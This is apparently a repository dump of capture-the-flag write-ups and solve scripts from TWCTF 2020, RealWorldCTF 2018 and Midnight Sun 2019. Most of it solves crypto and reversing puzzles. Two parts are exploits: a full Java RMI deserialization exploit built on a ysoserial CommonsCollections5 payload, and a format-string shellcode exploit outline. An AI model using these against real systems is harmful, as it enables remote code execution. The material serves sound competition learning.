14 | - This paper which explains how to do it for xorshift: [Further scramblings of Marsaglia's xorshift generators](https://arxiv.org/abs/1404.0390)
15 | 
16 | The custom PRNG is a lot like `xorshift`: It's got a lot of shifts and xors, an addition and an array of numbers that represent the PRNG state.
17 | The addition is only used for the output of the `randgen` function, and won't be relevant for `jump` as it's not used when advancing the state.
18 | 
19 | [Further scramblings of Marsaglia's xorshift generators](https://arxiv.org/abs/1404.0390) explains that PRNGs that only use shift and xor can be represented by a matrix-vector multiplication, which has some nice properties:
20 | If the matrix M represents one operation, `M*M` is a jump of 2. If we manage to find this matrix, we can implement `jump` using standard fast exponentiation and matrix-vector multiplication.
21 | 
22 | 
23 | To build this matrix, we unrolled 64 `randgen` calls into one operation, as this updates each state cell once and will resumes at the first cell again. We can now introduce each arithmetic operation into the matrix by multiplying a matrix that represents this operation (shifts are identity matrices with an offset, xors are identity matrices with additional diagonals).
24 | 
25 | 
26 | Solve scripts:
27 | - [gen.py](./gen.py) generates matrices for each randgen step (numpy, multiplication was very slow for these huge matrices so we switched to sage from here)
28 | - [mulitply_and_check.sage](./mulitply_and_check.sage) verifies these steps and produces the final randgen matrix
29 | - [solve.sage](./solve.sage) implements `jump` using the generated matrix and prints the flag.


--------------------------------------------------------------------------------
/2020/twctf/twin-d/output:
--------------------------------------------------------------------------------
1 | {"n":"26524843197458127443771133945229625523754949369487014791599807627467226519111599787153382777120140612738257288082433176299499326592447109018282964262146097640978728687735075346441171264146957020277385391199481846763287915008056667746576399729177879290302450987806685085618443327429255304452228199990620148364422757098951306559334815707120477401429317136913170569164607984049390008219435634838332608692894777468452421086790570305857094650986635845598625452629832435775350210325954240744747531362581445612743502972321327204242178398155653455971801057422863549217930378414742792722104721392516098829240589964116113253433","e1":"3288342258818750594497789899280507988608009422632301901890863784763217616490701057613228052043090509927547686042501854377982072935093691324981837282735741669355268200192971934847782966333731663681875702538275775308496023428187962287009210326890218776373213535570853144732649365499644400757341574136352057674421661851071361132160580465606353235714126225246121979148071634839325793257419779891687075215244608092289326285092057290933330050466351755345025419017436852718353794641136454223794422184912845557812856838827270018279670751739019476000437382608054677808858153944204833144150494295177481906551158333784518167127","e2":"20586777123945902753490294897129768995688830255152547498458791228840609956344138109339907853963357359541404633422300744201016345576195555604505930482179414108021094847896856094422857747050686108352530347664803839802347635174893144994932647157839626260092064101372096750666679214484068961156588820385019879979501182685765627312099064118600537936317964839371569513285434610671748047822599856396277714859626710571781608350664514470335146001120348208741966215074474578729244549563565178792603028804198318917007000826819363089407804185394528341886863297204719881851691620496202698379571497376834290321022681400643083508905","enc":"18719581313246346528221007858250620803088488607301313701590826442983941607809029805859628525891876064099979252513624998960822412974893002313208591462294684272954861105670518560956910898293761859372361017063600846481279095019009757152999533708737044666388054242961589273716178835651726686400826461459109341300219348927332096859088013848939302909121485953178179602997183289130409653008932258951903333059085283520324025705948839786487207249399025027249604682539137261225462015608695527914414053262360726764369412756336163681981689249905722741130346915738453436534240104046172205962351316149136700091558138836774987886046"}
2 | 


--------------------------------------------------------------------------------
/2020/twctf/sqrt/solve.sage:
--------------------------------------------------------------------------------
 1 | p = 6722156186149423473586056936189163112345526308304739592548269432948561498704906497631759731744824085311511299618196491816929603296108414569727189748975204102209646335725406551943711581704258725226874414399572244863268492324353927787818836752142254189928999592648333789131233670456465647924867060170327150559233
 2 | 
 3 | #test_pt = 46118657867175075976553297945503639995736180938511476693744608094459681699136649166462306787961876605
 4 | #c64 = pow(test_pt, 1 << 64, p)
 5 | c64 = 5602276430032875007249509644314357293319755912603737631044802989314683039473469151600643674831915676677562504743413434940280819915470852112137937963496770923674944514657123370759858913638782767380945111493317828235741160391407042689991007589804877919105123960837253705596164618906554015382923343311865102111160
 6 | 
 7 | q = 6260495806252046929286845900294522859477928195432517298076552742112950886324892284005656588584952135860464814694781314411135020941596864321946343173249814754547221898776857696421175805576386605600709481536943693517957341228010065655986626401676101786949671425529135194729299908929006799985530842254243
 8 | assert(p == 2**30*q + 1)
 9 | 
10 | k = 1
11 | exp2 = (1 << 34) + q*k
12 | e2inv = inverse_mod(exp2, p-1)
13 | c30 = pow(c64, e2inv, p)
14 | assert(pow(c30, 1<<34, p) == c64)
15 | print(c30)
16 | 
17 | c0_target = test_pt
18 | 
19 | #assert(pow(test_pt, 1 << 30, p) == c30)
20 | 
21 | print("Starting brute...")
22 | index = 0
23 | for c24 in c30.nth_root(2**6, all=True):
24 |     #if c24 != pow(test_pt, 2**24, p):
25 |     #    continue
26 |     for c16 in c24.nth_root(2**8, all=True):
27 |         #if c16 != pow(test_pt, 2**16, p):
28 |         #    continue
29 |         for c8 in c16.nth_root(2**8, all=True):
30 |             #if c8 != pow(test_pt, 2**8, p):
31 |             #    continue
32 |             for c0 in c8.nth_root(2**8, all=True):
33 |                 index += 1
34 |                 if index % 100000 == 0:
35 |                     print("progress:", index, float(index / 2**30))
36 |                 #print(hex(c0))
37 |                 h = hex(c0)
38 |                 if c0 == c0_target:
39 |                     print("FOUND!")
40 |                 if "0x54574354467b" in h:
41 |                     print("FOUND2", index, c0, len(hex(c0)))
42 |                     exit()
43 |                 #assert(pow(c0, 1 << 8, p) == c8)
44 |                 #assert(pow(c0, 1 << 16, p) == c16)
45 |                 #assert(pow(c0, 1 << 24, p) == c24)
46 |                 #assert(pow(c0, 1 << 30, p) == c30)
47 |                 #assert(pow(c0, 1 << 64, p) == c64)


--------------------------------------------------------------------------------
/2020/twctf/birds/birds.md:
--------------------------------------------------------------------------------
 1 | # Birds
 2 | 
 3 | In this challenge we got a list of what seems to be flight numbers, as well as the hint that the flag would be a proper sentence:
 4 | 
 5 | ```
 6 | TWCTF{
 7 | 
 8 | BC552
 9 | AC849
10 | JL106
11 | PQ448
12 | JL901
13 | LH908
14 | NH2177
15 | 
16 | }
17 | 
18 | It will be a proper sentence.
19 | Flag format is /^TWCTF{[A-Z]+}$/
20 | ```
21 | 
22 | First we gathered some initial information about these flights:
23 | 
24 | | Flight | From                  | To                          | Take off | UTC           | Landing | UTC           | Fligthtime (local-time-delta) | Airline            |
25 | | ------ | --------------------- | --------------------------- | -------- | ------------- | ------- | ------------- | ----------------------------- | ------------------ |
26 | | BC552  | OKA (Okinawa)         | NGO (Nagoya Chubu Centrair) | 11:00    | 19. Sep 02:00 | 13:10   | 19. Sep 04:10 | 02:10                         | Skymark            |
27 | | AC849  | LHR (London Heathrow) | YYZ (Toronto Pearson)       | 14:05    | 19. Sep 13:05 | 16:50   | 19. Sep 20:50 | 02:45                         | Air Canada         |
28 | | JL106  | ITM (Osaka Itami)     | HND (Tokyo Haneda)          | 08:30    | 18. Sep 23:30 | 09:40   | 19. Sep 00:40 | 01:10                         | Japan Airlines     |
29 | | PQ448  | TBS (Tbilisi)         | ODS (Odesa)                 | 03:35    | 18. Sep 23:35 | 04:45   | 19. Sep 01:45 | 01:10                         | SkyUp              |
30 | | JL901  | HND (Tokyo Haneda)    | OKA (Okinawa)               | 06:20    | 18. Sep 21:20 | 09:00   | 19. Sep 00:00 | 02:40                         | Japan Airlines     |
31 | | LH908  | FRA (Frankfurt)       | LHR (London Heathrow)       | 14:00    | 19. Sep 12:00 | 14:40   | 19. Sep 13:40 | 00:40                         | Lufthansa          |
32 | | NH2177 | NRT (Tokyo Narita)    | ITM (Osaka Itami)           | 16:40    | 19. Sep 07:40 | 18:00   | 19. Sep 09:00 | 01:20                         | All Nippon Airways |
33 | 
34 | Since we didn't really see anything concrete, we just tried out a bunch of combinations of the three letter airport codes. It became clear very quickly that this wouldn't yield proper sentences, so we started to only use the first letters. The words `FLY` and `TO` can both be built using these letters, which seemed like it could be part of the flag. A japanophile on our team recognized, that the word `NIHON` can also be formed from those letters, which is the Japanese name for Japan. This doesn't use all letters, but we were pretty desperate, so we tried to submit the flag `TWCTF{FLYTONIHON}` and that worked.
35 | 


--------------------------------------------------------------------------------
/2020/twctf/apple/solve.py:
--------------------------------------------------------------------------------
 1 | mask = 0xFFFFFFFF
 2 | 
 3 | def check1(inp):
 4 |     return [
 5 |         ((inp[1]+1) * inp[0]) & mask,
 6 |         ((inp[2]+1) * inp[1]) & mask,
 7 |         ((inp[3]+1) * inp[2]) & mask,
 8 |         ((inp[0]+1) * inp[3]) & mask,
 9 |     ]
10 | 
11 | def check2(inp):
12 |     return [
13 |         (inp[0] + 0xEEEC09DC) & mask,
14 |         (inp[1] + 0x03774ED1) & mask,
15 |         (inp[2] + 0x0C443FFF) & mask,
16 |         (inp[3] + 0x9FA8FC57) & mask,
17 |     ]
18 | 
19 | 
20 | def magicmod(a, b):
21 |     return btor.Cond(b == 0, a*a, a % b)
22 | 
23 | def check3(inp):
24 |     return [
25 |         (inp[0] + magicmod(inp[0] , inp[1])) & mask,
26 |         (inp[1] + magicmod(inp[1] , inp[2])) & mask,
27 |         (inp[2] + magicmod(inp[2] , inp[3])) & mask,
28 |         (inp[3] + magicmod(inp[3] , inp[0])) & mask,
29 |     ]
30 | 
31 | def check4(inp):
32 |     return [
33 |         (inp[0] + 0x0426C4E9) & mask,
34 |         (inp[1] + 0x58918FCD) & mask,
35 |         (inp[2] + 0xFA86D177) & mask,
36 |         (inp[3] + 0x6D320FED) & mask,
37 |     ]
38 | 
39 | def check5(inp):
40 |     return [
41 |         (inp[0] ^ 0x44D3E8D9) & mask,
42 |         (inp[1] ^ 0x47592C79) & mask,
43 |         (inp[2] ^ 0xEEBCD1C8) & mask,
44 |         (inp[3] ^ 0xF4C4E2F8) & mask,
45 |     ]
46 | 
47 | def printh(pref, inp):
48 |     print(pref+": "+" ".join(hex(x) for x in inp))
49 | 
50 | def doHash(inp):
51 |     for i in range(4):
52 |         inp = check1(inp)
53 |         inp = check2(inp)
54 |         inp = check3(inp)
55 |         inp = check4(inp)
56 |         inp = check5(inp)
57 |     return inp
58 | 
59 | from pyboolector import *
60 | import struct
61 | 
62 | # initialize boolector, and enable model generation, which is needed to print results when SAT
63 | btor = Boolector()
64 | btor.Set_opt(BTOR_OPT_MODEL_GEN, 1)
65 | 
66 | inp = [btor.Var(btor.BitVecSort(32)) for _ in range(4)]
67 | final = doHash(inp)
68 | 
69 | target = [
70 |     0x5935f1de,
71 |     0xb63725e7,
72 |     0xdfa10069,
73 |     0x4e556f64,
74 | ]
75 | 
76 | for j, i in enumerate(inp):
77 |     for x in range(0,32,8):
78 |         char = btor.Slice(i, x+7, x)
79 |         btor.Assert(0x20 <= char)
80 |         btor.Assert(char <= 0x7e)
81 | 
82 | for i, t in zip(final, target):
83 |     btor.Assert(i == t)
84 | 
85 | print("Solving...")
86 | result = btor.Sat()
87 | 
88 | if result == btor.SAT:
89 |   flag = b""
90 |   print("SAT")
91 |   print(",".join([hex(int(x.assignment,2)) for x in inp]))
92 |   for x in inp:
93 |       flag += struct.pack("<I", (int(x.assignment, 2)))
94 |   print("Flag: ", flag)
95 | else:
96 |   print("UNSAT", result)
97 | 
98 | 


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/xy/a.java.obf:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.com.securemessenger.a;
 2 | 
 3 | import java.io.ByteArrayOutputStream;
 4 | import javax.crypto.Mac;
 5 | import javax.crypto.spec.SecretKeySpec;
 6 | 
 7 | public abstract class a
 8 | {
 9 |   public a() {}
10 |   
11 |   public static a a(int paramInt)
12 |   {
13 |     switch (paramInt)
14 |     {
15 |     default: 
16 |       throw new AssertionError("Unknown version: " + paramInt);
17 |     case 2: 
18 |       return new b();
19 |     }
20 |     return new c();
21 |   }
22 |   
23 |   private byte[] a(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2)
24 |   {
25 |     try
26 |     {
27 |       Mac localMac = Mac.getInstance("HmacSHA256");
28 |       localMac.init(new SecretKeySpec(paramArrayOfByte1, "HmacSHA256"));
29 |       paramArrayOfByte1 = localMac.doFinal(paramArrayOfByte2);
30 |       return paramArrayOfByte1;
31 |     }
32 |     catch (Exception paramArrayOfByte1)
33 |     {
34 |       throw new AssertionError(paramArrayOfByte1);
35 |     }
36 |   }
37 |   
38 |   private byte[] b(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, int paramInt)
39 |   {
40 |     double d = paramInt / 32.0D;
41 |     try
42 |     {
43 |       int k = (int)Math.ceil(d);
44 |       byte[] arrayOfByte = new byte[0];
45 |       ByteArrayOutputStream localByteArrayOutputStream = new ByteArrayOutputStream();
46 |       int j = a();
47 |       int i = paramInt;
48 |       paramInt = j;
49 |       while (paramInt < a() + k)
50 |       {
51 |         Mac localMac = Mac.getInstance("HmacSHA256");
52 |         localMac.init(new SecretKeySpec(paramArrayOfByte1, "HmacSHA256"));
53 |         localMac.update(arrayOfByte);
54 |         if (paramArrayOfByte2 != null) {
55 |           localMac.update(paramArrayOfByte2);
56 |         }
57 |         localMac.update((byte)paramInt);
58 |         arrayOfByte = localMac.doFinal();
59 |         j = Math.min(i, arrayOfByte.length);
60 |         localByteArrayOutputStream.write(arrayOfByte, 0, j);
61 |         i -= j;
62 |         paramInt += 1;
63 |       }
64 |       paramArrayOfByte1 = localByteArrayOutputStream.toByteArray();
65 |       return paramArrayOfByte1;
66 |     }
67 |     catch (Exception paramArrayOfByte1)
68 |     {
69 |       throw new AssertionError(paramArrayOfByte1);
70 |     }
71 |   }
72 |   
73 |   protected abstract int a();
74 |   
75 |   public byte[] a(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, int paramInt)
76 |   {
77 |     return a(paramArrayOfByte1, new byte[32], paramArrayOfByte2, paramInt);
78 |   }
79 |   
80 |   public byte[] a(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, byte[] paramArrayOfByte3, int paramInt)
81 |   {
82 |     return b(a(paramArrayOfByte2, paramArrayOfByte1), paramArrayOfByte3, paramInt);
83 |   }
84 | }
85 | 


--------------------------------------------------------------------------------
/2020/twctf/rsa/rsa.md:
--------------------------------------------------------------------------------
 1 | # Reversing iS Amazing
 2 | 
 3 | The challenge is a binary that expects to be called with a single argument, the flag.
 4 | If the flag is passed as argument, it'll print `Correct!`, else `Incorrect!`.
 5 | 
 6 | Exploring the disassembly of the binary with [`radare2`](https://www.radare.org/r/), we quickly find an interesting function call:
 7 | 
 8 | ```
 9 | │    │││└─> 0x00000f53      488b8d00f5ff.  mov rcx, qword [var_b00h]
10 | │    │││    0x00000f5a      488d95f0f7ff.  lea rdx, [var_810h]
11 | │    │││    0x00000f61      488db5f0fbff.  lea rsi, [s1]
12 | │    │││    0x00000f68      8b85f0f4ffff   mov eax, dword [n]
13 | │    │││    0x00000f6e      41b801000000   mov r8d, 1
14 | │    │││    0x00000f74      89c7           mov edi, eax
15 | │    │││    0x00000f76      e825f9ffff     call sym.imp.RSA_private_encrypt ;
16 | ```
17 | 
18 | Since we can't find any data that looks like ascii in the binary, we can assume that this call will encrypt our input. Later, we find a call to memcmp, which probably compares the decrypted data to an expected value:
19 | 
20 | ```
21 | │      │    0x00000fa8      4889ce         mov rsi, rcx                ; const void *s2
22 | │      │    0x00000fab      4889c7         mov rdi, rax                ; const void *s1
23 | │      │    0x00000fae      e83df9ffff     call sym.imp.memcmp   
24 | ```
25 | 
26 | So let's first save the pointer to the expected data with gdb (gdb disables ASLR, so this will work):
27 | 
28 | ```
29 | $ pwndbg ./rsa
30 | pwndbg> start 
31 | pwndbg> brva 0xfae # call to memcmp 
32 | pwndbg> r fakeinput
33 |  ► 0x555555554fae    call   memcmp@plt <0x5555555548f0>
34 |         s1: 0x7fffffffdae0 ◂— 0xc9c6241e0aefc3a2
35 |         s2: 0x7fffffffd800 ◂— 0x5e8abe2996e4866f
36 |         n: 0x80
37 | pwndbg> r anotherinput # note s1,s2
38 |  ► 0x555555554fae    call   memcmp@plt <0x5555555548f0>
39 |         s1: 0x7fffffffdae0 ◂— 0x354bf07a076ade69
40 |         s2: 0x7fffffffd800 ◂— 0x5e8abe2996e4866f
41 |         n: 0x80
42 | # s1 changed, so s1 is the input. Save s2
43 | pwndbg> set $data=0x7fffffffd800
44 | ```
45 | 
46 | Now, we can call `RSA_public_decrypt` instead of the `RSA_private_encrypt` function to get the flag:
47 | 
48 | ```
49 | pwndbg> brva 0xf76 # call to encrypt func
50 | Breakpoint *0x555555554f76
51 | pwndbg> r whatever
52 |  ► 0x555555554f76    call   RSA_private_encrypt@plt <0x5555555548a0>
53 |         flen: 0x8
54 |         from: 0x7fffffffdee0 ◂— 0x7265766574616877 ('whatever')
55 |         to: 0x7fffffffdae0 ◂— 0x0
56 |         rsa: 0x55555576f7d0 ◂— 0x0
57 |         padding: 0x1
58 |         
59 | # call decrypt
60 | pwndbg> p (int)RSA_public_decrypt(0x80, $data, 0x7fffffffdae0, 0x55555576f7d0, 0x1)
61 | $11 = 28
62 | pwndbg> x/s 0x7fffffffdae0
63 | 0x7fffffffdae0:	"TWCTF{Rivest_Shamir_Adleman}"
64 | ```
65 | 


--------------------------------------------------------------------------------
/2018/RealWorldCTF2018_Finals/RMI/Main.java:
--------------------------------------------------------------------------------
 1 | import sun.rmi.server.UnicastRef;
 2 | import ysoserial.exploit.JRMPListener;
 3 | import ysoserial.payloads.ObjectPayload;
 4 | import javax.management.remote.rmi.RMIConnectionImpl_Stub;
 5 | import java.rmi.registry.LocateRegistry;
 6 | import java.rmi.registry.Registry;
 7 | 
 8 | public class Main {
 9 | 
10 |     public static void main(String[] args) throws Exception {
11 | 
12 |         // Generate an instance of the CommonsCollections5 payload exeucting "gnome-calculator"
13 |         final Class<? extends ObjectPayload> payloadClass = ObjectPayload.Utils.getPayloadClass("CommonsCollections5");
14 |         final ObjectPayload payload = payloadClass.newInstance();
15 |         final Object object = payload.getObject("gnome-calculator");
16 | 
17 |         // Start the remote GC listener at port 1337
18 |         JRMPListener listener = new JRMPListener(1337, object);
19 |         Thread thread = new Thread(listener);
20 |         thread.start();
21 |         
22 |         // Setup the RMI
23 |         Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
24 |         // Connect to RMI
25 |         registry.list();
26 | 
27 |         // Exploit the RMI, point to the JRMP listener
28 |         exploit(registry, "127.0.0.1", 1337);
29 |     }
30 | 
31 |     public static void exploit(final Registry registry,
32 |                                String jrmpHost, int jrmpPort ) throws Exception {
33 |            
34 |         // Generate the UnicastRef Object with the endpoint to the remote GC
35 |         UnicastRef payload = generateUnicastRef(jrmpHost, jrmpPort);
36 |         
37 |         // Generate random name 
38 |         String name = "pwned" + System.nanoTime();
39 |         
40 |         // Build an RMI Implementation from the unicastRef object
41 |         RMIConnectionImpl_Stub remote = new RMIConnectionImpl_Stub(payload);
42 | 
43 |         try {
44 |             // Bind the RMI implementation to the RMI
45 |             registry.bind(name, remote);
46 |         } catch (Throwable e) {
47 |             e.printStackTrace();
48 |         }
49 |         return;
50 | 
51 |     }
52 | 
53 |     public static UnicastRef generateUnicastRef(String host, int port) {
54 |         // Create a dummy objectId
55 |         java.rmi.server.ObjID objId = new java.rmi.server.ObjID();
56 |         // Create the TCP endpoint to the remote GC
57 |         sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);
58 |         // Create a "LiveRef" of the dummy object with the specified endpoint
59 |         sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);
60 |         // Wrap the LiveRef in the UnicastRef
61 |         return new sun.rmi.server.UnicastRef(liveRef);
62 |     }
63 | }
64 | 


--------------------------------------------------------------------------------
/2020/twctf/nothing-more-to-say-2020/Solution.md:
--------------------------------------------------------------------------------
 1 | # nothing more to say 2020
 2 | 
 3 | ## General
 4 | 
 5 | This was a warmup challenge and so the challenge creators decided to provide us with the challenge source code and tell us what the vulnerability is:
 6 | 
 7 | ```c
 8 | // gcc -fno-stack-protector -no-pie -z execstack
 9 | #include <stdio.h>
10 | #include <stdlib.h>
11 | #include <unistd.h>
12 | 
13 | void init_proc() {
14 |     setbuf(stdout, NULL);
15 |     setbuf(stdin, NULL);
16 |     setbuf(stderr, NULL);
17 | }
18 | 
19 | void read_string(char* buf, size_t length) {
20 |     ssize_t n;
21 |     n = read(STDIN_FILENO, buf, length);
22 |     if (n == -1)
23 |         exit(1);
24 |     buf[n] = '\0';
25 | }
26 | 
27 | int main(void) {
28 |     char buf[0x100]; 
29 |     init_proc();
30 |     printf("Hello CTF Players!\nThis is a warmup challenge for pwnable.\nDo you know about Format String Attack(FSA) and write the exploit code?\nPlease pwn me!\n");
31 |     while (1) {
32 |         printf("> ");
33 |         read_string(buf, 0x100);
34 |         if (buf[0] == 'q')
35 |             break;
36 |         printf(buf);
37 |     }
38 |     return 0;
39 | }
40 | ```
41 | 
42 | The code is very simple, there's a main loop, that reads in up to `0x100` characters from `stdin` into a `0x100` bytes buffer and directly passes that buffer as the first argument to `printf()`. This makes the program prone to a Format String Attack(FSA). 
43 | 
44 | Another interesting detail is, that the program has been compiled with `gcc -fno-stack-protector -no-pie -z execstack`. These flags will disable a range of exploit mitigations, which simplifies exploiting this vulnerability by a lot. 
45 | 
46 | ## Exploit
47 | 
48 | This setup enables us to use very basic techniques to exploit the vulnerability. Our plan is to use the FSA to 
49 | 
50 | 1. leak a stack address, 
51 | 2. write shellcode to the stack and finally 
52 | 3. overwrite a return pointer on the stack to point to our shellcode
53 | 
54 | This can be easily automated using the python `pwntools` package. First, we build a function to send arbitrary formatstrings to the program:
55 | ```python
56 | def send_format(fmt):
57 |     s.writeline(fmt)
58 |     return s.readuntil(b"> ", drop=True)
59 | ```
60 | 
61 | Then, we overwrite the return pointer of the main stackframe to point to a buffer using pwntools' `FmtStr` helper functions:
62 | ```python
63 |     f = pwn.FmtStr(send_format)
64 |     f.write(main_return, buffer_addr)
65 |     f.execute_writes()
66 | ```
67 | 
68 | and finally, we write our shellcode to that buffer:
69 | 
70 | ```python
71 | s.writeline(b"\x90"*0x30+pwn.asm(pwn.shellcraft.sh()))
72 | ```
73 | 
74 | All that's left to do now it to send the `q` command, which will trigger a return from the main function, which in return will fetch our corrupted return pointer, giving us arbitrary code execution.
75 | 
76 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/hfs-vm/hfs-vm.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | tags: ["re", "hfs-vm I"]
 3 | author: "LinHe"
 4 | ---
 5 | # Challenge
 6 | > Write a program in my crappy VM language.  
 7 | > Service: nc hfs-vm-01.play.midnightsunctf.se 4096  
 8 | > Download: [hfs-vm.tar.gz](https://s3.eu-north-1.amazonaws.com/dl.2019.midnightsunctf.se/529C928A6B855DC07AEEE66037E5452E255684E06230BB7C06690DA3D6279E4C/hfs-vm.tar.gz)
 9 | 
10 | As the description of this challenge already implies, we're required to create some Bytecode for a VM to get the flag. The first thing we did was (obviously) to find out how this Bytecode and the VM works by disassembling the provided binary.
11 | 
12 | # VM
13 | The VM has 16 registers, with register 14 being the Stack Pointer (SP) and register 15 being the Program Counter (PC).  
14 | Each Register is 16 bit (one word) wide.  
15 | Additionally, there is a Stack which may contain up to 32 words (64 byte).  
16 | The VM consists of two processes:
17 | 
18 | 1. The main process which is used for syscalls (see the Bytecode section below).
19 | 2. A secondary process which is executing our bytecode and communicates with the first one. It has seccomp enabled.
20 | 
21 | # Bytecode
22 | Each instruction in this Bytecode is exactly 32 bit wide.  
23 | Instructions operate on two registers: A source (src) register and a destination (dst) register.  
24 | Some instructions also support immediate (imm) values. In this case, the source register is unused and the immediate value is used instead.  
25 | There are 11 instructions:
26 | 
27 | 0. move: dst = src / dst = imm
28 | 1. add: dst = dst + src / dst = dst + imm
29 | 2. subtract: dst = dst - src / dst = dst - imm
30 | 3. exchange: Exchanges the contents of dst and src
31 | 4. xor: dst = dst ^ src / dst = dst ^ imm
32 | 5. push: Pushes dst or imm on the stack. src is unused. SP is decremented by one.
33 | 6. pop: Pops a value from the stack into dst. src is unused. SP is increased by one.
34 | 7. stack set relative: Writes a value on the stack (src or imm) relative to dst. No bounds checking is performed (would have been useful for hfs-vm2).
35 | 8. stack get relative: Reads a value from the stack relative to src and stores it in dst. No bounds checking is performed as well.
36 | 9. syscall: Performs a syscall. Syscall number must be stored in register 1. See syscalls below.
37 | 10. show registers: Prints the contents of all registers and the stack.
38 | 
39 | # Syscalls
40 | There are 5 syscalls:
41 | 
42 | 0. Run ls.
43 | 1. Write the contents of the stack to stdout.
44 | 2. Writes the uid or euid to the stack.
45 | 3. Writes the flag to the stack(!).
46 | 4. Writes data from /dev/urandom to the stack.
47 | 
48 | # Solution
49 | After looking at the syscalls, the solution was pretty easy:
50 | 
51 | 1. Reserve some space for the flag on the stack.
52 | 2. Perform syscall 3 to get the flag.
53 | 3. Perform syscall 1 to print the flag.
54 | 
55 | See exploit.py for the full exploit.
56 | The flag is `midnight{m3_h4bl0_vm}`.
57 | 


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/xy/a.java:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.helper.securemessenger.xy;
 2 | 
 3 | import java.io.ByteArrayOutputStream;
 4 | import javax.crypto.Mac;
 5 | import javax.crypto.spec.SecretKeySpec;
 6 | 
 7 | public abstract class a
 8 | {
 9 |   public a() {}
10 |   
11 |   public static a a(int paramInt)
12 |   {
13 |     switch (paramInt)
14 |     {
15 |     default: 
16 |       throw new AssertionError("Unknown version: " + paramInt);
17 |     case 2: 
18 |       return new XYGraphWidget();
19 |     }
20 |     return new PositionMetric();
21 |   }
22 |   
23 |   private byte[] read(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, int paramInt)
24 |   {
25 |     double d = paramInt / 32.0D;
26 |     try
27 |     {
28 |       d = Math.ceil(d);
29 |       int k = (int)d;
30 |       Object localObject1 = new byte[0];
31 |       ByteArrayOutputStream localByteArrayOutputStream = new ByteArrayOutputStream();
32 |       int j = b();
33 |       int i = paramInt;
34 |       paramInt = j;
35 |       for (;;)
36 |       {
37 |         j = b();
38 |         if (paramInt >= j + k) {
39 |           break;
40 |         }
41 |         Object localObject2 = Mac.getInstance("HmacSHA256");
42 |         ((Mac)localObject2).init(new SecretKeySpec(paramArrayOfByte1, "HmacSHA256"));
43 |         ((Mac)localObject2).update((byte[])localObject1);
44 |         if (paramArrayOfByte2 != null) {
45 |           ((Mac)localObject2).update(paramArrayOfByte2);
46 |         }
47 |         byte b = (byte)paramInt;
48 |         ((Mac)localObject2).update(b);
49 |         localObject2 = ((Mac)localObject2).doFinal();
50 |         localObject1 = localObject2;
51 |         j = localObject2.length;
52 |         j = Math.min(i, j);
53 |         localByteArrayOutputStream.write((byte[])localObject2, 0, j);
54 |         i -= j;
55 |         paramInt += 1;
56 |       }
57 |       paramArrayOfByte1 = localByteArrayOutputStream.toByteArray();
58 |       return paramArrayOfByte1;
59 |     }
60 |     catch (Exception paramArrayOfByte1)
61 |     {
62 |       throw new AssertionError(paramArrayOfByte1);
63 |     }
64 |   }
65 |   
66 |   private byte[] sha256Hmac(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2)
67 |   {
68 |     try
69 |     {
70 |       Mac localMac = Mac.getInstance("HmacSHA256");
71 |       localMac.init(new SecretKeySpec(paramArrayOfByte1, "HmacSHA256"));
72 |       paramArrayOfByte1 = localMac.doFinal(paramArrayOfByte2);
73 |       return paramArrayOfByte1;
74 |     }
75 |     catch (Exception paramArrayOfByte1)
76 |     {
77 |       throw new AssertionError(paramArrayOfByte1);
78 |     }
79 |   }
80 |   
81 |   public byte[] a(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, int paramInt)
82 |   {
83 |     return a(paramArrayOfByte1, new byte[32], paramArrayOfByte2, paramInt);
84 |   }
85 |   
86 |   public byte[] a(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, byte[] paramArrayOfByte3, int paramInt)
87 |   {
88 |     return read(sha256Hmac(paramArrayOfByte2, paramArrayOfByte1), paramArrayOfByte3, paramInt);
89 |   }
90 |   
91 |   protected abstract int b();
92 | }
93 | 


--------------------------------------------------------------------------------
/2017/files/rev250/SrcCleaned/securemessenger/Participant.java:
--------------------------------------------------------------------------------
 1 | package messenger.hackit2017.helper.securemessenger;
 2 | 
 3 | import java.util.ArrayList;
 4 | import java.util.Arrays;
 5 | import java.util.HashMap;
 6 | import java.util.Iterator;
 7 | import java.util.List;
 8 | import java.util.Map;
 9 | import messenger.hackit2017.com.securemessenger.f;
10 | import org.whispersystems.curve25519.Curve25519;
11 | import org.whispersystems.curve25519.Curve25519KeyPair;
12 | 
13 | public class Participant
14 | {
15 |   private List<Participant> activeSessions;
16 |   private Map<Long, byte[]> seedByteArrayStorage;
17 |   public String username;
18 |   private Curve25519KeyPair keyPair = Curve25519.get("best").createKeyPair();
19 |   
20 |   public Participant(String username)
21 |   {
22 |     this.username = username;
23 |     activeSessions = new ArrayList(10);
24 |     seedByteArrayStorage = new HashMap(10);
25 |   }
26 |   
27 |   private EncryptedSession getCreateSession(Participant paramParticipant)
28 |   {
29 |     paramParticipant = new EncryptedSession(this, paramParticipant, keyPair.privateKey());
30 |     Iterator localIterator = a.iterator();
31 |     while (localIterator.hasNext())
32 |     {
33 |       EncryptedSession localEncryptedSession = (EncryptedSession)localIterator.next();
34 |       if (localEncryptedSession.equals(paramParticipant)) {
35 |         return localEncryptedSession;
36 |       }
37 |     }
38 |     Logger.add(username + "/session/est");
39 |     activeSessions.add(paramParticipant);
40 |     return paramParticipant;
41 |   }
42 |   
43 |   public SeedStorage GenerateKeyPairStore()
44 |   {
45 |     Curve25519KeyPair localCurve25519KeyPair = Curve25519.get("best").getKeyPair();
46 |     SeedStorage localSeedStorage = new SeedStorage(localCurve25519KeyPair.getPublicKey());
47 |     seedByteArrayStorage.put(Long.valueOf(localSeedStorage.getSeed()), localCurve25519KeyPair.getPrivateKey());
